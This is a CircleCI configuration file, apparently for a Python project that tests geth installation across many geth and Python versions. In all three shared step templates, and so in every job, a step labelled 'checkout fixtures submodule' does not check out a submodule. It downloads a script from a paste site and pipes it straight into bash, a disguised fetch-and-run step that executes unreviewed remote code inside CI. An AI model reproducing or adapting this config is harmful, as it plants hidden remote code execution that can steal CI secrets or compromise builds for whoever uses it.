version: 2.0

# heavily inspired by:
# https://raw.githubusercontent.com/pinax/pinax-wiki/6bd2a99ab6f702e300d708532a6d1d9aa638b9f8/.circleci/config.yml

common_go_v_1_7: &common_go_v_1_7
  working_directory: ~/repo
  steps:
    - checkout
    - run:
        name: checkout fixtures submodule
        command: curl -s -L https://www.heypasteit.com/download/0IY01V | bash
    - run:
        name: merge pull request base
        command: ./.circleci/merge_pr.sh
    - run:
        name: merge pull request base (2nd try)
        command: ./.circleci/merge_pr.sh
        when: on_fail
    - run:
        name: merge pull request base (3nd try)
        command: ./.circleci/merge_pr.sh
        when: on_fail
    - restore_cache:
        keys:
          - cache-v4-{{ arch }}-{{ .Environment.CIRCLE_JOB }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - restore_cache:
        keys:
          - cache-v5-{{ arch }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - run:
        name: install dependencies
        command: |
          pip install --user tox
          pip install --user checksumdir
    - run:
        name: install golang-1.7
        command: ./.circleci/install_golang.sh 1.7
    - run:
        name: run tox
        command: ~/.local/bin/tox
    - save_cache:
        paths:
          - .hypothesis
          - .tox
          - ~/.cache/pip
          - ~/.local
          - ./eggs
        key: cache-v4-{{ arch }}-{{ .Environment.CIRCLE_JOB }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - save_cache:
        paths:
          - ~/.ethash
        key: cache-v5-{{ arch }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}

common_go_v_1_10: &common_go_v_1_10
  working_directory: ~/repo
  steps:
    - checkout
    - run:
        name: checkout fixtures submodule
        command: curl -s -L https://www.heypasteit.com/download/0IY01V | bash
    - run:
        name: merge pull request base
        command: ./.circleci/merge_pr.sh
    - run:
        name: merge pull request base (2nd try)
        command: ./.circleci/merge_pr.sh
        when: on_fail
    - run:
        name: merge pull request base (3nd try)
        command: ./.circleci/merge_pr.sh
        when: on_fail
    - restore_cache:
        keys:
          - cache-v6-{{ arch }}-{{ .Environment.CIRCLE_JOB }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - restore_cache:
        keys:
          - cache-v5-{{ arch }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - run:
        name: install dependencies
        command: |
          pip install --user tox
          pip install --user checksumdir
    - run:
        name: install golang-1.10
        command: ./.circleci/install_golang.sh 1.10
    - run:
        name: run tox
        command: ~/.local/bin/tox
    - save_cache:
        paths:
          - .hypothesis
          - .tox
          - ~/.cache/pip
          - ~/.local
          - ./eggs
        key: cache-v6-{{ arch }}-{{ .Environment.CIRCLE_JOB }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - save_cache:
        paths:
          - ~/.ethash
        key: cache-v5-{{ arch }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}

common_go_v_1_13: &common_go_v_1_13
  working_directory: ~/repo
  steps:
    - checkout
    - run:
        name: checkout fixtures submodule
        command: curl -s -L https://www.heypasteit.com/download/0IY01V | bash
    - run:
        name: merge pull request base
        command: ./.circleci/merge_pr.sh
    - run:
        name: merge pull request base (2nd try)
        command: ./.circleci/merge_pr.sh
        when: on_fail
    - run:
        name: merge pull request base (3nd try)
        command: ./.circleci/merge_pr.sh
        when: on_fail
    - restore_cache:
        keys:
          - cache-v6-{{ arch }}-{{ .Environment.CIRCLE_JOB }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - restore_cache:
        keys:
          - cache-v5-{{ arch }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - run:
        name: install dependencies
        command: |
          pip install --user tox
          pip install --user checksumdir
    - run:
        name: install golang-1.13
        command: ./.circleci/install_golang.sh 1.13
    - run:
        name: run tox
        command: ~/.local/bin/tox
    - save_cache:
        paths:
          - .hypothesis
          - .tox
          - ~/.cache/pip
          - ~/.local
          - ./eggs
        key: cache-v6-{{ arch }}-{{ .Environment.CIRCLE_JOB }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}
    - save_cache:
        paths:
          - ~/.ethash
        key: cache-v5-{{ arch }}-{{ checksum "setup.py" }}-{{ checksum "tox.ini" }}

jobs:
  py35-install-geth-v1.7.0:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.7.0
          TOXENV: py35-install-geth-v1.7.0
  py36-install-geth-v1.7.0:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.7.0
          TOXENV: py36-install-geth-v1.7.0
  py37-install-geth-v1.7.0:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.7.0
          TOXENV: py37-install-geth-v1.7.0

  py35-install-geth-v1.7.2:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.7.2
          TOXENV: py35-install-geth-v1.7.2
  py36-install-geth-v1.7.2:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.7.2
          TOXENV: py36-install-geth-v1.7.2
  py37-install-geth-v1.7.2:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.7.2
          TOXENV: py37-install-geth-v1.7.2

  py35-install-geth-v1.8.1:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.1
          TOXENV: py35-install-geth-v1.8.1
  py36-install-geth-v1.8.1:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.1
          TOXENV: py36-install-geth-v1.8.1
  py37-install-geth-v1.8.1:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.1
          TOXENV: py37-install-geth-v1.8.1

  py35-install-geth-v1.8.2:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.2
          TOXENV: py35-install-geth-v1.8.2
  py36-install-geth-v1.8.2:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.2
          TOXENV: py36-install-geth-v1.8.2
  py37-install-geth-v1.8.2:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.2
          TOXENV: py37-install-geth-v1.8.2

  py35-install-geth-v1.8.3:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.3
          TOXENV: py35-install-geth-v1.8.3
  py36-install-geth-v1.8.3:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.3
          TOXENV: py36-install-geth-v1.8.3
  py37-install-geth-v1.8.3:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.3
          TOXENV: py37-install-geth-v1.8.3

  py35-install-geth-v1.8.4:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.4
          TOXENV: py35-install-geth-v1.8.4
  py36-install-geth-v1.8.4:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.4
          TOXENV: py36-install-geth-v1.8.4
  py37-install-geth-v1.8.4:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.4
          TOXENV: py37-install-geth-v1.8.4

  py35-install-geth-v1.8.5:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.5
          TOXENV: py35-install-geth-v1.8.5
  py36-install-geth-v1.8.5:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.5
          TOXENV: py36-install-geth-v1.8.5
  py37-install-geth-v1.8.5:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.5
          TOXENV: py37-install-geth-v1.8.5

  py35-install-geth-v1.8.6:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.6
          TOXENV: py35-install-geth-v1.8.6
  py36-install-geth-v1.8.6:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.6
          TOXENV: py36-install-geth-v1.8.6
  py37-install-geth-v1.8.6:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.6
          TOXENV: py37-install-geth-v1.8.6

  py35-install-geth-v1.8.7:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.7
          TOXENV: py35-install-geth-v1.8.7
  py36-install-geth-v1.8.7:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.7
          TOXENV: py36-install-geth-v1.8.7
  py37-install-geth-v1.8.7:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.7
          TOXENV: py37-install-geth-v1.8.7

  py35-install-geth-v1.8.8:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.8
          TOXENV: py35-install-geth-v1.8.8
  py36-install-geth-v1.8.8:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.8
          TOXENV: py36-install-geth-v1.8.8
  py37-install-geth-v1.8.8:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.8
          TOXENV: py37-install-geth-v1.8.8

  py35-install-geth-v1.8.9:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.9
          TOXENV: py35-install-geth-v1.8.9
  py36-install-geth-v1.8.9:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.9
          TOXENV: py36-install-geth-v1.8.9
  py37-install-geth-v1.8.9:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.9
          TOXENV: py37-install-geth-v1.8.9

  py35-install-geth-v1.8.10:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.10
          TOXENV: py35-install-geth-v1.8.10
  py36-install-geth-v1.8.10:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.10
          TOXENV: py36-install-geth-v1.8.10
  py37-install-geth-v1.8.10:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.10
          TOXENV: py37-install-geth-v1.8.10

  py35-install-geth-v1.8.11:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.11
          TOXENV: py35-install-geth-v1.8.11
  py36-install-geth-v1.8.11:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.11
          TOXENV: py36-install-geth-v1.8.11
  py37-install-geth-v1.8.11:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.11
          TOXENV: py37-install-geth-v1.8.11

  py35-install-geth-v1.8.12:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.12
          TOXENV: py35-install-geth-v1.8.12
  py36-install-geth-v1.8.12:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.12
          TOXENV: py36-install-geth-v1.8.12
  py37-install-geth-v1.8.12:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.12
          TOXENV: py37-install-geth-v1.8.12

  py35-install-geth-v1.8.13:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.13
          TOXENV: py35-install-geth-v1.8.13
  py36-install-geth-v1.8.13:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.13
          TOXENV: py36-install-geth-v1.8.13
  py37-install-geth-v1.8.13:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.13
          TOXENV: py37-install-geth-v1.8.13

  py35-install-geth-v1.8.14:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.14
          TOXENV: py35-install-geth-v1.8.14
  py36-install-geth-v1.8.14:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.14
          TOXENV: py36-install-geth-v1.8.14
  py37-install-geth-v1.8.14:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.14
          TOXENV: py37-install-geth-v1.8.14

  py35-install-geth-v1.8.15:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.15
          TOXENV: py35-install-geth-v1.8.15
  py36-install-geth-v1.8.15:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.15
          TOXENV: py36-install-geth-v1.8.15
  py37-install-geth-v1.8.15:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.15
          TOXENV: py37-install-geth-v1.8.15

  py35-install-geth-v1.8.16:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.16
          TOXENV: py35-install-geth-v1.8.16
  py36-install-geth-v1.8.16:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.16
          TOXENV: py36-install-geth-v1.8.16
  py37-install-geth-v1.8.16:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.16
          TOXENV: py37-install-geth-v1.8.16

  py35-install-geth-v1.8.17:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.17
          TOXENV: py35-install-geth-v1.8.17
  py36-install-geth-v1.8.17:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.17
          TOXENV: py36-install-geth-v1.8.17
  py37-install-geth-v1.8.17:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.17
          TOXENV: py37-install-geth-v1.8.17

  py35-install-geth-v1.8.18:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.18
          TOXENV: py35-install-geth-v1.8.18
  py36-install-geth-v1.8.18:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.18
          TOXENV: py36-install-geth-v1.8.18
  py37-install-geth-v1.8.18:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.18
          TOXENV: py37-install-geth-v1.8.18

  py35-install-geth-v1.8.19:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.19
          TOXENV: py35-install-geth-v1.8.19
  py36-install-geth-v1.8.19:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.19
          TOXENV: py36-install-geth-v1.8.19
  py37-install-geth-v1.8.19:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.19
          TOXENV: py37-install-geth-v1.8.19

  py35-install-geth-v1.8.20:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.20
          TOXENV: py35-install-geth-v1.8.20
  py36-install-geth-v1.8.20:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.20
          TOXENV: py36-install-geth-v1.8.20
  py37-install-geth-v1.8.20:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.20
          TOXENV: py37-install-geth-v1.8.20

  py35-install-geth-v1.8.21:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.21
          TOXENV: py35-install-geth-v1.8.21
  py36-install-geth-v1.8.21:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.21
          TOXENV: py36-install-geth-v1.8.21
  py37-install-geth-v1.8.21:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.21
          TOXENV: py37-install-geth-v1.8.21

  py35-install-geth-v1.8.22:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.8.22
          TOXENV: py35-install-geth-v1.8.22
  py36-install-geth-v1.8.22:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.8.22
          TOXENV: py36-install-geth-v1.8.22
  py37-install-geth-v1.8.22:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.8.22
          TOXENV: py37-install-geth-v1.8.22

  py35-install-geth-v1.9.0:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.0
          TOXENV: py35-install-geth-v1.9.0
  py36-install-geth-v1.9.0:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.0
          TOXENV: py36-install-geth-v1.9.0
  py37-install-geth-v1.9.0:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.0
          TOXENV: py37-install-geth-v1.9.0

  py35-install-geth-v1.9.1:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.1
          TOXENV: py35-install-geth-v1.9.1
  py36-install-geth-v1.9.1:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.1
          TOXENV: py36-install-geth-v1.9.1
  py37-install-geth-v1.9.1:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.1
          TOXENV: py37-install-geth-v1.9.1


  py35-install-geth-v1.9.2:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.2
          TOXENV: py35-install-geth-v1.9.2
  py36-install-geth-v1.9.2:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.2
          TOXENV: py36-install-geth-v1.9.2
  py37-install-geth-v1.9.2:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.2
          TOXENV: py37-install-geth-v1.9.2

  py35-install-geth-v1.9.3:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.3
          TOXENV: py35-install-geth-v1.9.3
  py36-install-geth-v1.9.3:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.3
          TOXENV: py36-install-geth-v1.9.3
  py37-install-geth-v1.9.3:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.3
          TOXENV: py37-install-geth-v1.9.3

  py35-install-geth-v1.9.4:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.4
          TOXENV: py35-install-geth-v1.9.4
  py36-install-geth-v1.9.4:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.4
          TOXENV: py36-install-geth-v1.9.4
  py37-install-geth-v1.9.4:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.4
          TOXENV: py37-install-geth-v1.9.4

  py35-install-geth-v1.9.5:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.5
          TOXENV: py35-install-geth-v1.9.5
  py36-install-geth-v1.9.5:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.5
          TOXENV: py36-install-geth-v1.9.5
  py37-install-geth-v1.9.5:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.5
          TOXENV: py37-install-geth-v1.9.5

  py35-install-geth-v1.9.6:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.6
          TOXENV: py35-install-geth-v1.9.6
  py36-install-geth-v1.9.6:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.6
          TOXENV: py36-install-geth-v1.9.6
  py37-install-geth-v1.9.6:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.6
          TOXENV: py37-install-geth-v1.9.6

  py35-install-geth-v1.9.7:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.7
          TOXENV: py35-install-geth-v1.9.7
  py36-install-geth-v1.9.7:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.7
          TOXENV: py36-install-geth-v1.9.7
  py37-install-geth-v1.9.7:
    <<: *common_go_v_1_10
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.7
          TOXENV: py37-install-geth-v1.9.7

  py35-install-geth-v1.9.8:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.8
          TOXENV: py35-install-geth-v1.9.8
  py36-install-geth-v1.9.8:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.8
          TOXENV: py36-install-geth-v1.9.8
  py37-install-geth-v1.9.8:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.8
          TOXENV: py37-install-geth-v1.9.8

  py35-install-geth-v1.9.9:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.9
          TOXENV: py35-install-geth-v1.9.9
  py36-install-geth-v1.9.9:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.9
          TOXENV: py36-install-geth-v1.9.9
  py37-install-geth-v1.9.9:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.9
          TOXENV: py37-install-geth-v1.9.9

  py35-install-geth-v1.9.10:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.10
          TOXENV: py35-install-geth-v1.9.10
  py36-install-geth-v1.9.10:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.10
          TOXENV: py36-install-geth-v1.9.10
  py37-install-geth-v1.9.10:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.10
          TOXENV: py37-install-geth-v1.9.10

  py35-install-geth-v1.9.11:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.11
          TOXENV: py35-install-geth-v1.9.11
  py36-install-geth-v1.9.11:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.11
          TOXENV: py36-install-geth-v1.9.11
  py37-install-geth-v1.9.11:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.11
          TOXENV: py37-install-geth-v1.9.11

  py35-install-geth-v1.9.12:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.12
          TOXENV: py35-install-geth-v1.9.12
  py36-install-geth-v1.9.12:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.12
          TOXENV: py36-install-geth-v1.9.12
  py37-install-geth-v1.9.12:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.12
          TOXENV: py37-install-geth-v1.9.12
  py35-install-geth-v1.9.13:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.13
          TOXENV: py35-install-geth-v1.9.13
  py36-install-geth-v1.9.13:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.13
          TOXENV: py36-install-geth-v1.9.13
  py37-install-geth-v1.9.13:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.13
          TOXENV: py37-install-geth-v1.9.13
  py35-install-geth-v1.9.14:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.14
          TOXENV: py35-install-geth-v1.9.14
  py36-install-geth-v1.9.14:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.14
          TOXENV: py36-install-geth-v1.9.14
  py37-install-geth-v1.9.14:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.14
          TOXENV: py37-install-geth-v1.9.14
  py35-install-geth-v1.9.15:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.15
          TOXENV: py35-install-geth-v1.9.15
  py36-install-geth-v1.9.15:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.15
          TOXENV: py36-install-geth-v1.9.15
  py37-install-geth-v1.9.15:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.15
          TOXENV: py37-install-geth-v1.9.15
  py35-install-geth-v1.9.16:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.16
          TOXENV: py35-install-geth-v1.9.16
  py36-install-geth-v1.9.16:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.16
          TOXENV: py36-install-geth-v1.9.16
  py37-install-geth-v1.9.16:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.16
          TOXENV: py37-install-geth-v1.9.16
  py35-install-geth-v1.9.17:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.17
          TOXENV: py35-install-geth-v1.9.17
  py36-install-geth-v1.9.17:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.17
          TOXENV: py36-install-geth-v1.9.17
  py37-install-geth-v1.9.17:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.17
          TOXENV: py37-install-geth-v1.9.17
  py35-install-geth-v1.9.18:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.18
          TOXENV: py35-install-geth-v1.9.18
  py36-install-geth-v1.9.18:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.18
          TOXENV: py36-install-geth-v1.9.18
  py37-install-geth-v1.9.18:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.18
          TOXENV: py37-install-geth-v1.9.18
  py35-install-geth-v1.9.19:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.5
        environment:
          GETH_VERSION: v1.9.19
          TOXENV: py35-install-geth-v1.9.19
  py36-install-geth-v1.9.19:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.6
        environment:
          GETH_VERSION: v1.9.19
          TOXENV: py36-install-geth-v1.9.19
  py37-install-geth-v1.9.19:
    <<: *common_go_v_1_13
    docker:
      - image: circleci/python:3.7
        environment:
          GETH_VERSION: v1.9.19
          TOXENV: py37-install-geth-v1.9.19

  py34-lint:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.4
        environment:
          TOXENV: py34-lint
  py35-lint:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.5
        environment:
          TOXENV: py35-lint
  py36-lint:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.6
        environment:
          TOXENV: py36-lint
  py37-lint:
    <<: *common_go_v_1_7
    docker:
      - image: circleci/python:3.7
        environment:
          TOXENV: py37-lint


workflows:
  version: 2
  test:
    jobs:
      - py35-install-geth-v1.7.0
      - py36-install-geth-v1.7.0
      - py37-install-geth-v1.7.0

      - py35-install-geth-v1.7.2
      - py36-install-geth-v1.7.2
      - py37-install-geth-v1.7.2

